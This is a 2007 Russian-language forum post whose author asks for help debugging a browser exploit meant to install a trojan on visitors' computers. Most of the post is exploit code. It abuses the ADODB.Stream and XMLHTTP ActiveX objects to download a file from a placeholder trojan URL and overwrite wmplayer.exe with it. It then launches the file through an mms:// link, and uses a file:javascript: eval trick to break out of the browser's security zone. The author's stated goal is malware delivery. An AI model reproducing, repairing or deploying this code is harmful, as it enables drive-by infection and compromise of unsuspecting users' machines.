ADODB.Stream Exploit+Троян

Discussion in 'Безопасность и Анонимность' started by kalpsik, 12 Nov 2007.

  1. kalpsik

    kalpsik Elder - Старейшина

    Joined:
    10 Jan 2007
    Messages:
    58
    Likes Received:
    18
    Reputations:
    0
    люди, помогите немного плз...
    решил впихнуть троя яваскриптом...
    взгляд упал на ADODB эксплоит
    Code:
    <textarea id="code" style="display:none;">
    
        var x = new ActiveXObject("Microsoft.XMLHTTP");
        x.Open("GET", "путь к трою",0);
        x.Send();
    
        var s = new ActiveXObject("ADODB.Stream");
        s.Mode = 3;
        s.Type = 1;
        s.Open();
        s.Write(x.responseBody);
    
        s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
        location.href = "mms://";
    
    </textarea>
    
    <script language="javascript">
    
        function preparecode(code) {
            result = '';
            lines = code.split(/\r\n/);
            for (i=0;i<lines.length;i++) {
    
                line = lines[i];
                line = line.replace(/^\s+/,"");
                line = line.replace(/\s+$/,"");
                line = line.replace(/'/g,"\\'");
                line = line.replace(/[\\]/g,"\\\\");
                line = line.replace(/[/]/g,"%2f");
    
                if (line != '') {
                    result += line +'\\r\\n';
                }
            }
            return result;
        }
    
        function doit() {
            mycode = preparecode(document.all.code.value);
            myURL = "file:javascript:eval('" + mycode + "')";
            window.open(myURL, "_media")
        }
    
    
        window.open("error.jsp","_media");
    
        setTimeout("doit()", 5000);
    
    
    </script>
    
    при проверке эксплоита получаю "отказано в доступе" на строке window.open(myURL, "_media")
    подскажите плз че не так....
     
    1 person likes this.